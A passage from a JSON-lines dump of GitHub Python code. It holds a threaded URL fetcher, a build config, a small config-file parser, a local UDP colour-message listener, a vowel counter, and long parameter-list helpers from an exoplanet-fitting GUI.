concurrent.futures as fut\nfrom urllib.request import urlopen\nimport time\n\nlinks = open('urls.txt', encoding='utf8').read().split('\\n')\n\n\ndef load_url(url, timeout):\n with urlopen(url, timeout=timeout) as conn:\n return conn.read()\n\nstart = time.time()\nwith fut.ThreadPoolExecutor(max_workers=100) as executor:\n future_to_url = dict()\n\n for url in links:\n future_to_url[executor.submit(load_url, url, 20)] = url\n\n for future in fut.as_completed(future_to_url):\n url = future_to_url[future]\n try:\n data=future.result()\n except Exception as exception:\n print(url,\" generated an exception\", exception)\n else:\n print(f\"{url} - {len(data)}\")\n\nprint(time.time()-start)","repo_name":"Pasha62/multi-task-at-19","sub_path":"io_bound.py","file_name":"io_bound.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"43666547602","text":"import os\n\n\nbuild_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nhome_path = os.path.dirname(build_dir)\nconfig_dir = os.path.join(home_path,'config.xml')\nkbuild_path = '%s/cmake/common/build_auxiliary_script' % home_path\n\ncpus_ = {'all': ['clean', 'm4'],\n 'clean':['clean'],\n 'm4': ['m4']\n }\n\ncpu_plat = {'m4': ['cortex']\n }\n","repo_name":"laiyoufafa/kernel_uniproton","sub_path":"build/uniproton_ci_lib/globle.py","file_name":"globle.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21920248598","text":"# coding=utf-8\n\n\nimport os\nimport re\n\n\ndefault_golem_conf = '''\n[golem]\nname:\n[user]\nname:\n[books]\nlibro primero: test\n'''\ngolemfile_path = os.path.join(os.path.expanduser('~'), \"golem.txt\")\nif not os.path.exists(default_golem_conf):\n with open(golemfile_path, \"w+\") as f:\n f.write(default_golem_conf)\n\n\nclass Golem(object):\n def __init__(self):\n with open(golemfile_path, \"r\") as f:\n config = f.read()\n self.info = ConfigParser(config, ['golem', 'books', 'user'])\n self.id = self.info.golem\n self.books = self.info.books\n self.user = self.info.user\n\n\nclass ConfigParser(object):\n def __init__(self, text, allowed_fields=None):\n self._sections = {}\n self._allowed_fields = allowed_fields or []\n pattern = re.compile(\"^\\[([a-z_]{2,50})\\]\")\n current_lines = []\n for line in text.splitlines():\n line = line.strip()\n if not line or line[0] == '#':\n continue\n m = pattern.match(line)\n if m:\n group = m.group(1)\n if self._allowed_fields and group not in self._allowed_fields:\n raise ParserException(\"ConfigParser: Unrecognized field '%s'\" % group)\n current_lines = []\n self._sections[group] = current_lines\n else:\n current_lines.append(line)\n for key, value in self._sections.iteritems():\n self._sections[key] = ConfigSection(key, \"\\n\".join(value))\n\n def __getattr__(self, name):\n if name in self._sections:\n return self._sections[name]\n else:\n if self._allowed_fields and name in self._allowed_fields:\n return \"\"\n else:\n raise ParserException(\"ConfigParser: Unrecognized field '%s'\" % name)\n\n def __repr__(self):\n rep = []\n for key, value in self._sections.iteritems():\n rep.append('[' + key + ']')\n rep.append(value.__repr__())\n return '\\n'.join(rep)\n\n\nclass ConfigSection(object):\n\n def __init__(self, section, text):\n self.section = section\n self._sections = {}\n for line in text.splitlines():\n key, value = line.split(':', 1)\n value = value.replace(' ', '') if value.startswith(' ') else value\n self._sections['_'.join(key.split(' '))] = value\n\n def __getattr__(self, key):\n if key in self._sections:\n return self._sections[key]\n return None\n\n def __repr__(self):\n rep = []\n for key, value in self._sections.iteritems():\n rep.append(key + ': ' + value)\n rep = '\\n'.join(rep)\n return rep\n\n\nclass ParserException(Exception):\n pass\n","repo_name":"bqlabs/golem","sub_path":"golem/core/golem.py","file_name":"golem.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30810881589","text":"#!/usr/bin/env python\n\nimport socket\nimport struct\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\ns.bind(('192.168.1.200', 12345))\n\nwhile True:\n message, sender = s.recvfrom(4096)\n if len(message) == 16:\n color = struct.unpack(\"4f\", message)\n print(color, sender, len(message))\n if len(message) == 4:\n command = struct.unpack(\"f\",message)\n print(command, sender, len(message))\n if message == b'quit':\n break\n","repo_name":"AssoAndrea/UE-ArduinoLightController","sub_path":"PythonMiddleware/test_UDPserver.py","file_name":"test_UDPserver.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"25374682202","text":"def contador_vogais(texto: str):\n vogais = ['a', 'e', 'i', 'o', 'u']\n contador = 0\n\n for letra in texto.lower():\n if letra in vogais:\n contador += 1\n \n return contador\n\ntotal = contador_vogais('Eduardo Mendes')\nprint(f'Total = {total}')\n\n","repo_name":"ProfessorDudarts/Unasp-HT-2023.2","sub_path":"algoritmos_II/lista_funcoes/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30637914521","text":"#!/usr/bin/python\n\n\ndef param_gui(self):\n \n param_gui = [\n self.K1, self.P1, self.e1, self.om1, self.ma1, self.incl1, self.Omega1,\n self.K2, self.P2, self.e2, self.om2, self.ma2, self.incl2, self.Omega2,\n self.K3, self.P3, self.e3, self.om3, self.ma3, self.incl3, self.Omega3,\n self.K4, self.P4, self.e4, self.om4, self.ma4, self.incl4, self.Omega4, \n self.K5, self.P5, self.e5, self.om5, self.ma5, self.incl5, self.Omega5,\n self.K6, self.P6, self.e6, self.om6, self.ma6, self.incl6, self.Omega6,\n self.K7, self.P7, self.e7, self.om7, self.ma7, self.incl7, self.Omega7, \n self.K8, self.P8, self.e8, self.om8, self.ma8, self.incl8, self.Omega8,\n self.K9, self.P9, self.e9, self.om9, self.ma9, self.incl9, self.Omega9,\n ]\n\n return param_gui\n\ndef param_errors_gui(self):\n\n param_errors_gui = [self.err_K1,self.err_P1,self.err_e1,self.err_om1,self.err_ma1, self.err_i1, self.err_Om1,\n self.err_K2,self.err_P2,self.err_e2,self.err_om2,self.err_ma2, self.err_i2, self.err_Om2,\n self.err_K3,self.err_P3,self.err_e3,self.err_om3,self.err_ma3, self.err_i3, self.err_Om3,\n self.err_K4,self.err_P4,self.err_e4,self.err_om4,self.err_ma4, self.err_i4, self.err_Om4, \n self.err_K5,self.err_P5,self.err_e5,self.err_om5,self.err_ma5, self.err_i5, self.err_Om5,\n self.err_K6,self.err_P6,self.err_e6,self.err_om6,self.err_ma6, self.err_i6, self.err_Om6,\n self.err_K7,self.err_P7,self.err_e7,self.err_om7,self.err_ma7, self.err_i7, self.err_Om7, \n self.err_K8,self.err_P8,self.err_e8,self.err_om8,self.err_ma8, self.err_i8, self.err_Om8,\n self.err_K9,self.err_P9,self.err_e9,self.err_om9,self.err_ma9, self.err_i9, self.err_Om9, \n ]\n return param_errors_gui\n\ndef use_param_gui(self):\n\n use_param_gui = [self.use_K1, self.use_P1, self.use_e1, self.use_om1, self.use_ma1, self.use_incl1, self.use_Omega1,\n self.use_K2, self.use_P2, self.use_e2, self.use_om2, self.use_ma2, self.use_incl2, self.use_Omega2,\n self.use_K3, self.use_P3, self.use_e3, self.use_om3, self.use_ma3, self.use_incl3, self.use_Omega3, \n self.use_K4, self.use_P4, self.use_e4, self.use_om4, self.use_ma4, self.use_incl4, self.use_Omega4, \n self.use_K5, self.use_P5, self.use_e5, self.use_om5, self.use_ma5, self.use_incl5, self.use_Omega5, \n self.use_K6, self.use_P6, self.use_e6, self.use_om6, self.use_ma6, self.use_incl6, self.use_Omega6, \n self.use_K7, self.use_P7, self.use_e7, self.use_om7, self.use_ma7, self.use_incl7, self.use_Omega7, \n self.use_K8, self.use_P8, self.use_e8, self.use_om8, self.use_ma8, self.use_incl8, self.use_Omega8, \n self.use_K9, self.use_P9, self.use_e9, self.use_om9, self.use_ma9, self.use_incl9, self.use_Omega9, \n ]\n return use_param_gui\n\n\n\n\n###########################################################################\n\n\n\ndef param_gui_wd(self):\n \n param_gui_wd = [\n self.om_dot_1, self.om_dot_2, self.om_dot_3, \n self.om_dot_4, self.om_dot_5, self.om_dot_6, \n self.om_dot_7, self.om_dot_8, self.om_dot_9\n ]\n return param_gui_wd\n\ndef use_param_gui_wd(self):\n\n use_param_gui_wd = [\n self.use_om_dot_1, self.use_om_dot_2, self.use_om_dot_3, \n self.use_om_dot_4, self.use_om_dot_5, self.use_om_dot_6, \n self.use_om_dot_7, self.use_om_dot_8, self.use_om_dot_9\n ]\n return use_param_gui_wd\n\ndef param_errors_gui_wd(self):\n\n param_errors_gui_wd = [\n self.err_om_dot_1,self.err_om_dot_2,self.err_om_dot_3,\n self.err_om_dot_4,self.err_om_dot_5,self.err_om_dot_6,\n self.err_om_dot_7,self.err_om_dot_8,self.err_om_dot_9,\n ]\n return param_errors_gui_wd\n\n###########################################################################\n\n\n\ndef param_gui_tr(self):\n \n param_gui_tr = [\n self.t0_1, self.pl_rad_1, self.a_sol_1,\n self.t0_2, self.pl_rad_2, self.a_sol_2,\n self.t0_3, self.pl_rad_3, self.a_sol_3,\n self.t0_4, self.pl_rad_4, self.a_sol_4, \n self.t0_5, self.pl_rad_5, self.a_sol_5,\n self.t0_6, self.pl_rad_6, self.a_sol_6,\n self.t0_7, self.pl_rad_7, self.a_sol_7, \n self.t0_8, self.pl_rad_8, self.a_sol_8,\n self.t0_9, self.pl_rad_9, self.a_sol_9,\n ]\n return param_gui_tr\n\n\n\ndef use_param_gui_tr(self):\n\n use_param_gui_tr = [self.use_t0_1, self.use_pl_rad_1, self.use_a_sol_1,\n self.use_t0_2, self.use_pl_rad_2, self.use_a_sol_2,\n self.use_t0_3, self.use_pl_rad_3, self.use_a_sol_3,\n self.use_t0_4, self.use_pl_rad_4, self.use_a_sol_4, \n self.use_t0_5, self.use_pl_rad_5, self.use_a_sol_5,\n self.use_t0_6, self.use_pl_rad_6, self.use_a_sol_6,\n self.use_t0_7, self.use_pl_rad_7, self.use_a_sol_7, \n self.use_t0_8, self.use_pl_rad_8, self.use_a_sol_8,\n self.use_t0_9, self.use_pl_rad_9, self.use_a_sol_9,\n ]\n\n\n return use_param_gui_tr\n\n###########################################################################\n\n\ndef rvs_data_gui(self):\n rvs_data_gui = [\n self.Data1,self.Data2,self.Data3,self.Data4,self.Data5,\n self.Data6,self.Data7,self.Data8,self.Data9,self.Data10\n ]\n return rvs_data_gui\n\n\n\ndef rvs_data_jitter_gui(self):\n rvs_data_jitter_gui = [\n self.jitter_Data1,self.jitter_Data2,self.jitter_Data3,self.jitter_Data4,self.jitter_Data5,\n self.jitter_Data6,self.jitter_Data7,self.jitter_Data8,self.jitter_Data9,self.jitter_Data10\n ]\n return rvs_data_jitter_gui\n\n\ndef use_data_offset_gui(self):\n\n use_data_offset_gui = [self.use_offset_Data1,self.use_offset_Data2,self.use_offset_Data3,self.use_offset_Data4,\n self.use_offset_Data5,self.use_offset_Data6,self.use_offset_Data7,self.use_offset_Data8,\n self.use_offset_Data9,self.use_offset_Data10]\n \n return use_data_offset_gui\n\n\ndef use_data_jitter_gui(self):\n\n use_data_jitter_gui = [self.use_jitter_Data1,self.use_jitter_Data2,self.use_jitter_Data3,self.use_jitter_Data4,self.use_jitter_Data5,\n self.use_jitter_Data6,self.use_jitter_Data7,self.use_jitter_Data8,self.use_jitter_Data9,self.use_jitter_Data10]\n \n return use_data_jitter_gui\n\n\ndef data_errors_gui(self):\n\n data_errors_gui = [\n self.err_Data1,self.err_Data2,self.err_Data3,self.err_Data4,self.err_Data5,\n self.err_Data6,self.err_Data7,self.err_Data8,self.err_Data9,self.err_Data10\n ]\n \n return data_errors_gui\n\n\ndef data_errors_jitter_gui(self):\n\n data_errors_jitter_gui = [\n self.err_jitter_Data1,self.err_jitter_Data2,self.err_jitter_Data3,self.err_jitter_Data4,self.err_jitter_Data5,\n self.err_jitter_Data6,self.err_jitter_Data7,self.err_jitter_Data8,self.err_jitter_Data9,self.err_jitter_Data10\n ]\n\n return data_errors_jitter_gui\n\n\ndef tra_data_gui(self):\n\n tra_data_gui = [\n self.trans_Data1,self.trans_Data2,self.trans_Data3,self.trans_Data4,self.trans_Data5,\n self.trans_Data6,self.trans_Data7,self.trans_Data8,self.trans_Data9,self.trans_Data10\n ]\n return tra_data_gui\n \ndef tra_data_jitter_gui(self):\n\n tra_data_jitter_gui = [\n self.jitter_trans_Data1,self.jitter_trans_Data2,self.jitter_trans_Data3,self.jitter_trans_Data4,self.jitter_trans_Data5,\n self.jitter_trans_Data6,self.jitter_trans_Data7,self.jitter_trans_Data8,self.jitter_trans_Data9,self.jitter_trans_Data10\n ]\n return tra_data_jitter_gui\n\n\ndef use_tra_data_offset_gui(self):\n\n use_tra_data_offset_gui = [\n self.use_offset_trans_Data1,self.use_offset_trans_Data2,self.use_offset_trans_Data3,self.use_offset_trans_Data4,\n self.use_offset_trans_Data5,self.use_offset_trans_Data6,self.use_offset_trans_Data7,self.use_offset_trans_Data8,\n self.use_offset_trans_Data9,self.use_offset_trans_Data10\n ]\n\n return use_tra_data_offset_gui\n\n\ndef use_tra_data_jitter_gui(self):\n \n use_tra_data_jitter_gui = [\n self.use_jitter_trans_Data1,self.use_jitter_trans_Data2,self.use_jitter_trans_Data3,self.use_jitter_trans_Data4,\n self.use_jitter_trans_Data5,self.use_jitter_trans_Data6,self.use_jitter_trans_Data7,self.use_jitter_trans_Data8,\n self.use_jitter_trans_Data9,self.use_jitter_trans_Data10\n ]\n \n return use_tra_data_jitter_gui\n\n\ndef tra_data_errors_gui(self):\n\n tra_data_errors_gui = [\n self.err_trans_Data1,self.err_trans_Data2,self.err_trans_Data3,self.err_trans_Data4,self.err_trans_Data5,\n self.err_trans_Data6,self.err_trans_Data7,self.err_trans_Data8,self.err_trans_Data9,self.err_trans_Data10\n ]\n \n return tra_data_errors_gui\n\ndef tra_data_errors_jitter_gui(self):\n\n tra_data_errors_jitter_gui = [\n self.err_jitter_trans_Data1,self.err_jitter_trans_Data2,self.err_jitter_trans_Data3,self.err_jitter_trans_Data4,\n self.err_jitter_trans_Data5,self.err_jitter_trans_Data6,self.err_jitter_trans_Data7,self.err_jitter_trans_Data8,\n self.err_jitter_trans_Data9,self.err_jitter_trans_Data10\n ]\n \n return tra_data_errors_jitter_gui\n\n\n\n\n\n\ndef param_bounds_gui(self):\n \n param_bounds_gui = [\n [self.K_min_1,self.K_max_1],[self.P_min_1,self.P_max_1], [self.e_min_1,self.e_max_1],[self.om_min_1,self.om_max_1], [self.ma_min_1,self.ma_max_1],[self.incl_min_1,self.incl_max_1], [self.Omega_min_1,self.Omega_max_1],[self.t0_min_1,self.t0_max_1],[self.pl_rad_min_1,self.pl_rad_max_1],[self.a_sol_min_1,self.a_sol_max_1],\n [self.K_min_2,self.K_max_2],[self.P_min_2,self.P_max_2], [self.e_min_2,self.e_max_2],[self.om_min_2,self.om_max_2], [self.ma_min_2,self.ma_max_2],[self.incl_min_2,self.incl_max_2], [self.Omega_min_2,self.Omega_max_2],[self.t0_min_2,self.t0_max_2],[self.pl_rad_min_2,self.pl_rad_max_2],[self.a_sol_min_2,self.a_sol_max_2],\n [self.K_min_3,self.K_max_3],[self.P_min_3,self.P_max_3], [self.e_min_3,self.e_max_3],[self.om_min_3,self.om_max_3], [self.ma_min_3,self.ma_max_3],[self.incl_min_3,self.incl_max_3], [self.Omega_min_3,self.Omega_max_3],[self.t0_min_3,self.t0_max_3],[self.pl_rad_min_3,self.pl_rad_max_3],[self.a_sol_min_3,self.a_sol_max_3],\n [self.K_min_4,self.K_max_4],[self.P_min_4,self.P_max_4], [self.e_min_4,self.e_max_4],[self.om_min_4,self.om_max_4], [self.ma_min_4,self.ma_max_4],[self.incl_min_4,self.incl_max_4], [self.Omega_min_4,self.Omega_max_4],[self.t0_min_4,self.t0_max_4],[self.pl_rad_min_4,self.pl_rad_max_4],[self.a_sol_min_4,self.a_sol_max_4],\n [self.K_min_5,self.K_max_5],[self.P_min_5,self.P_max_5], [self.e_min_5,self.e_max_5],[self.om_min_5,self.om_max_5], [self.ma_min_5,self.ma_max_5],[self.incl_min_5,self.incl_max_5], [self.Omega_min_5,self.Omega_max_5],[self.t0_min_5,self.t0_max_5],[self.pl_rad_min_5,self.pl_rad_max_5],[self.a_sol_min_5,self.a_sol_max_5],\n [self.K_min_6,self.K_max_6],[self.P_min_6,self.P_max_6], [self.e_min_6,self.e_max_6],[self.om_min_6,self.om_max_6], [self.ma_min_6,self.ma_max_6],[self.incl_min_6,self.incl_max_6], [self.Omega_min_6,self.Omega_max_6],[self.t0_min_6,self.t0_max_6],[self.pl_rad_min_6,self.pl_rad_max_6],[self.a_sol_min_6,self.a_sol_max_6],\n [self.K_min_7,self.K_max_7],[self.P_min_7,self.P_max_7], [self.e_min_7,self.e_max_7],[self.om_min_7,self.om_max_7], [self.ma_min_7,self.ma_max_7],[self.incl_min_7,self.incl_max_7], [self.Omega_min_7,self.Omega_max_7],[self.t0_min_7,self.t0_max_7],[self.pl_rad_min_7,self.pl_rad_max_7],[self.a_sol_min_7,self.a_sol_max_7],\n [self.K_min_8,self.K_max_8],[self.P_min_8,self.P_max_8], [self.e_min_8,self.e_max_8],[self.om_min_8,self.om_max_8], [self.ma_min_8,self.ma_max_8],[self.incl_min_8,self.incl_max_8], [self.Omega_min_8,self.Omega_max_8],[self.t0_min_8,self.t0_max_8],[self.pl_rad_min_8,self.pl_rad_max_8],[self.a_sol_min_8,self.a_sol_max_8],\n [self.K_min_9,self.K_max_9],[self.P_min_9,self.P_max_9], [self.e_min_9,self.e_max_9],[self.om_min_9,self.om_max_9], [self.ma_min_9,self.ma_max_9],[self.incl_min_9,self.incl_max_9], [self.Omega_min_9,self.Omega_max_9],[self.t0_min_9,self.t0_max_9],[self.pl_rad_min_9,self.pl_rad_max_9],[self.a_sol_min_9,self.a_sol_max_9] \n ]\n \n return param_bounds_gui\n\n\n\n\ndef offset_bounds_gui(self):\n \n offset_bounds_gui = [\n [self.Data1_min,self.Data1_max], [self.Data2_min,self.Data2_max], [self.Data3_min,self.Data3_max], [self.Data4_min,self.Data4_max], [self.Data5_min,self.Data5_max], \n [self.Data6_min,self.Data6_max], [self.Data7_min,self.Data7_max], [self.Data8_min,self.Data8_max], [self.Data9_min,self.Data9_max], [self.Data10_min,self.Data10_max]\n ]\n \n return offset_bounds_gui\n \n\n\ndef jitter_bounds_gui(self): \n \n jitter_bounds_gui = [\n [self.jitter1_min,self.jitter1_max], [self.jitter2_min,self.jitter2_max], [self.jitter3_min,self.jitter3_max], [self.jitter4_min,self.jitter4_max], [self.jitter5_min,self.jitter5_max], \n [self.jitter6_min,self.jitter6_max], [self.jitter7_min,self.jitter7_max], [self.jitter8_min,self.jitter8_max], [self.jitter9_min,self.jitter9_max], [self.jitter10_min,self.Data10_max] \n ] \n \n return jitter_bounds_gui\n\n\n################### OmDot ########################\n\ndef om_dot_bounds_gui(self):\n\n om_dot_bounds_gui = [\n [self.omega_dot_min_1,self.omega_dot_max_1], [self.omega_dot_min_2,self.omega_dot_max_2], \n [self.omega_dot_min_3,self.omega_dot_max_3], [self.omega_dot_min_4,self.omega_dot_max_4], \n [self.omega_dot_min_5,self.omega_dot_max_5], [self.omega_dot_min_6,self.omega_dot_max_6], \n [self.omega_dot_min_7,self.omega_dot_max_7], [self.omega_dot_min_8,self.omega_dot_max_8], \n [self.omega_dot_min_9,self.omega_dot_max_9] \n ] \n return om_dot_bounds_gui\n\n\n################### LD ########################\n\ndef use_uni_ld_models(self):\n\n use_uni_ld_models = [\n self.use_uniform_ld_1,self.use_uniform_ld_2,self.use_uniform_ld_3,self.use_uniform_ld_4,self.use_uniform_ld_5,\n self.use_uniform_ld_6,self.use_uniform_ld_7,self.use_uniform_ld_8,self.use_uniform_ld_9,self.use_uniform_ld_10\n ]\n return use_uni_ld_models\n\n\ndef use_lin_ld_models(self):\n\n use_lin_ld_models = [\n self.use_linear_ld_1,self.use_linear_ld_2,self.use_linear_ld_3,self.use_linear_ld_4,self.use_linear_ld_5,\n self.use_linear_ld_6,self.use_linear_ld_7,self.use_linear_ld_8,self.use_linear_ld_9,self.use_linear_ld_10\n ]\n return use_lin_ld_models\n\n\ndef use_quad_ld_models(self):\n \n use_quad_ld_models =[\n self.use_quadratic_ld_1,self.use_quadratic_ld_2,self.use_quadratic_ld_3,self.use_quadratic_ld_4,self.use_quadratic_ld_5,\n self.use_quadratic_ld_6,self.use_quadratic_ld_7,self.use_quadratic_ld_8,self.use_quadratic_ld_9,self.use_quadratic_ld_10\n ] \n return use_quad_ld_models\n\n\ndef use_nonlin_ld_models(self):\n \n use_nonlin_ld_models = [\n self.use_nonlinear_ld_1,self.use_nonlinear_ld_2,self.use_nonlinear_ld_3,self.use_nonlinear_ld_4,self.use_nonlinear_ld_5,\n self.use_nonlinear_ld_6,self.use_nonlinear_ld_7,self.use_nonlinear_ld_8,self.use_nonlinear_ld_9,self.use_nonlinear_ld_10\n ] \n return use_nonlin_ld_models\n\n\ndef lin_u(self):\n\n lin_u = [self.u1_linear_1,self.u1_linear_2,self.u1_linear_3,self.u1_linear_4,self.u1_linear_5,\n self.u1_linear_6,self.u1_linear_7,self.u1_linear_8,self.u1_linear_9,self.u1_linear_10\n ]\n return lin_u\n\ndef use_lin_u(self):\n\n use_lin_u = [\n self.use_u1_linear_1,self.use_u1_linear_2,self.use_u1_linear_3,self.use_u1_linear_4,self.use_u1_linear_5,\n self.use_u1_linear_6,self.use_u1_linear_7,self.use_u1_linear_8,self.use_u1_linear_9,self.use_u1_linear_10\n ]\n return use_lin_u\n\n\ndef quad_u1(self):\n\n quad_u1 = [\n self.u1_quadratic_1,self.u1_quadratic_2,self.u1_quadratic_3,self.u1_quadratic_4,self.u1_quadratic_5,\n self.u1_quadratic_6,self.u1_quadratic_7,self.u1_quadratic_8,self.u1_quadratic_9,self.u1_quadratic_10\n ]\n return quad_u1\n\ndef use_quad_u1(self):\n\n use_quad_u1 = [\n self.use_u1_quadratic_1,self.use_u1_quadratic_2,self.use_u1_quadratic_3,self.use_u1_quadratic_4,self.use_u1_quadratic_5,\n self.use_u1_quadratic_6,self.use_u1_quadratic_7,self.use_u1_quadratic_8,self.use_u1_quadratic_9,self.use_u1_quadratic_10\n ]\n return use_quad_u1\n\ndef quad_u2(self):\n\n quad_u2 = [\n self.u2_quadratic_1,self.u2_quadratic_2,self.u2_quadratic_3,self.u2_quadratic_4,self.u2_quadratic_5,\n self.u2_quadratic_6,self.u2_quadratic_7,self.u2_quadratic_8,self.u2_quadratic_9,self.u2_quadratic_10\n ]\n return quad_u2\n\ndef use_quad_u2(self):\n\n use_quad_u2 = [\n self.use_u2_quadratic_1,self.use_u2_quadratic_2,self.use_u2_quadratic_3,self.use_u2_quadratic_4,self.use_u2_quadratic_5,\n self.use_u2_quadratic_6,self.use_u2_quadratic_7,self.use_u2_quadratic_8,self.use_u2_quadratic_9,self.use_u2_quadratic_10\n ]\n return use_quad_u2\n \n\n\ndef nonlin_u1(self):\n\n nonlin_u1 = [\n self.u1_nonlin_1,self.u1_nonlin_2,self.u1_nonlin_3,self.u1_nonlin_4,self.u1_nonlin_5,\n self.u1_nonlin_6,self.u1_nonlin_7,self.u1_nonlin_8,self.u1_nonlin_9,self.u1_nonlin_10\n ]\n return nonlin_u1\n\ndef use_nonlin_u1(self):\n\n use_nonlin_u1 = [\n self.use_u1_nonlin_1,self.use_u1_nonlin_2,self.use_u1_nonlin_3,self.use_u1_nonlin_4,self.use_u1_nonlin_5,\n self.use_u1_nonlin_6,self.use_u1_nonlin_7,self.use_u1_nonlin_8,self.use_u1_nonlin_9,self.use_u1_nonlin_10\n ]\n return use_nonlin_u1\n\n\ndef nonlin_u2(self):\n\n nonlin_u2 = [\n self.u2_nonlin_1,self.u2_nonlin_2,self.u2_nonlin_3,self.u2_nonlin_4,self.u2_nonlin_5,\n self.u2_nonlin_6,self.u2_nonlin_7,self.u2_nonlin_8,self.u2_nonlin_9,self.u2_nonlin_10\n ]\n return nonlin_u2\n\ndef use_nonlin_u2(self):\n\n use_nonlin_u2 = [\n self.use_u2_nonlin_1,self.use_u2_nonlin_2,self.use_u2_nonlin_3,self.use_u2_nonlin_4,self.use_u2_nonlin_5,\n self.use_u2_nonlin_6,self.use_u2_nonlin_7,self.use_u2_nonlin_8,self.use_u2_nonlin_9,self.use_u2_nonlin_10\n ]\n return use_nonlin_u2\n\n\ndef nonlin_u3(self):\n\n nonlin_u3 = [\n self.u3_nonlin_1,self.u3_nonlin_2,self.u3_nonlin_3,self.u3_nonlin_4,self.u3_nonlin_5,\n self.u3_nonlin_6,self.u3_nonlin_7,self.u3_nonlin_8,self.u3_nonlin_9,self.u3_nonlin_10\n ]\n return nonlin_u3\n\ndef use_nonlin_u3(self):\n\n use_nonlin_u3 = [\n self.use_u3_nonlin_1,self.use_u3_nonlin_2,self.use_u3_nonlin_3,self.use_u3_nonlin_4,self.use_u3_nonlin_5,\n self.use_u3_nonlin_6,self.use_u3_nonlin_7,self.use_u3_nonlin_8,self.use_u3_nonlin_9,self.use_u3_nonlin_10\n ]\n return use_nonlin_u3\n\ndef nonlin_u4(self):\n\n nonlin_u4 = [\n self.u4_nonlin_1,self.u4_nonlin_2,self.u4_nonlin_3,self.u4_nonlin_4,self.u4_nonlin_5,\n self.u4_nonlin_6,self.u4_nonlin_7,self.u4_nonlin_8,self.u4_nonlin_9,self.u4_nonlin_10\n ]\n return nonlin_u4\n\ndef use_nonlin_u4(self):\n\n use_nonlin_u4 = [\n self.use_u4_nonlin_1,self.use_u4_nonlin_2,self.use_u4_nonlin_3,self.use_u4_nonlin_4,self.use_u4_nonlin_5,\n self.use_u4_nonlin_6,self.use_u4_nonlin_7,self.use_u4_nonlin_8,self.use_u4_nonlin_9,self.use_u4_nonlin_10\n ]\n return use_nonlin_u4\n\n################# Normal Prior ################\n \n\n\ndef param_nr_priors_gui(self):\n \n param_nr_priors_gui = [\n [self.K_mean_1.value(),self.K_sigma_1.value(),self.use_K_norm_pr_1.isChecked()],[self.P_mean_1.value(),self.P_sigma_1.value(),self.use_P_norm_pr_1.isChecked()], [self.e_mean_1.value(),self.e_sigma_1.value(),self.use_e_norm_pr_1.isChecked()],[self.om_mean_1.value(),self.om_sigma_1.value(),self.use_om_norm_pr_1.isChecked()], [self.ma_mean_1.value(),self.ma_sigma_1.value(),self.use_ma_norm_pr_1.isChecked()],[self.incl_mean_1.value(),self.incl_sigma_1.value(),self.use_incl_norm_pr_1.isChecked()], [self.Omega_mean_1.value(),self.Omega_sigma_1.value(), self.use_Omega_norm_pr_1.isChecked()],[self.t0_mean_1.value(),self.t0_sigma_1.value(), self.use_t0_norm_pr_1.isChecked()],[self.pl_rad_mean_1.value(),self.pl_rad_sigma_1.value(),self.use_pl_rad_norm_pr_1.isChecked()],[self.a_sol_mean_1.value(),self.a_sol_sigma_1.value(),self.use_a_sol_norm_pr_1.isChecked()],\n [self.K_mean_2.value(),self.K_sigma_2.value(),self.use_K_norm_pr_2.isChecked()],[self.P_mean_2.value(),self.P_sigma_2.value(),self.use_P_norm_pr_2.isChecked()], [self.e_mean_2.value(),self.e_sigma_2.value(),self.use_e_norm_pr_2.isChecked()],[self.om_mean_2.value(),self.om_sigma_2.value(),self.use_om_norm_pr_2.isChecked()], [self.ma_mean_2.value(),self.ma_sigma_2.value(),self.use_ma_norm_pr_2.isChecked()],[self.incl_mean_2.value(),self.incl_sigma_2.value(),self.use_incl_norm_pr_2.isChecked()], [self.Omega_mean_2.value(),self.Omega_sigma_2.value(), self.use_Omega_norm_pr_2.isChecked()],[self.t0_mean_2.value(),self.t0_sigma_2.value(), self.use_t0_norm_pr_2.isChecked()],[self.pl_rad_mean_2.value(),self.pl_rad_sigma_2.value(),self.use_pl_rad_norm_pr_2.isChecked()],[self.a_sol_mean_2.value(),self.a_sol_sigma_2.value(),self.use_a_sol_norm_pr_2.isChecked()],\n [self.K_mean_3.value(),self.K_sigma_3.value(),self.use_K_norm_pr_3.isChecked()],[self.P_mean_3.value(),self.P_sigma_3.value(),self.use_P_norm_pr_3.isChecked()], [self.e_mean_3.value(),self.e_sigma_3.value(),self.use_e_norm_pr_3.isChecked()],[self.om_mean_3.value(),self.om_sigma_3.value(),self.use_om_norm_pr_3.isChecked()], [self.ma_mean_3.value(),self.ma_sigma_3.value(),self.use_ma_norm_pr_3.isChecked()],[self.incl_mean_3.value(),self.incl_sigma_3.value(),self.use_incl_norm_pr_3.isChecked()], [self.Omega_mean_3.value(),self.Omega_sigma_3.value(), self.use_Omega_norm_pr_3.isChecked()],[self.t0_mean_3.value(),self.t0_sigma_3.value(), self.use_t0_norm_pr_3.isChecked()],[self.pl_rad_mean_3.value(),self.pl_rad_sigma_3.value(),self.use_pl_rad_norm_pr_3.isChecked()],[self.a_sol_mean_3.value(),self.a_sol_sigma_3.value(),self.use_a_sol_norm_pr_3.isChecked()],\n [self.K_mean_4.value(),self.K_sigma_4.value(),self.use_K_norm_pr_4.isChecked()],[self.P_mean_4.value(),self.P_sigma_4.value(),self.use_P_norm_pr_4.isChecked()], [self.e_mean_4.value(),self.e_sigma_4.value(),self.use_e_norm_pr_4.isChecked()],[self.om_mean_4.value(),self.om_sigma_4.value(),self.use_om_norm_pr_4.isChecked()], [self.ma_mean_4.value(),self.ma_sigma_4.value(),self.use_ma_norm_pr_4.isChecked()],[self.incl_mean_4.value(),self.incl_sigma_4.value(),self.use_incl_norm_pr_4.isChecked()], [self.Omega_mean_4.value(),self.Omega_sigma_4.value(), self.use_Omega_norm_pr_4.isChecked()],[self.t0_mean_4.value(),self.t0_sigma_4.value(), 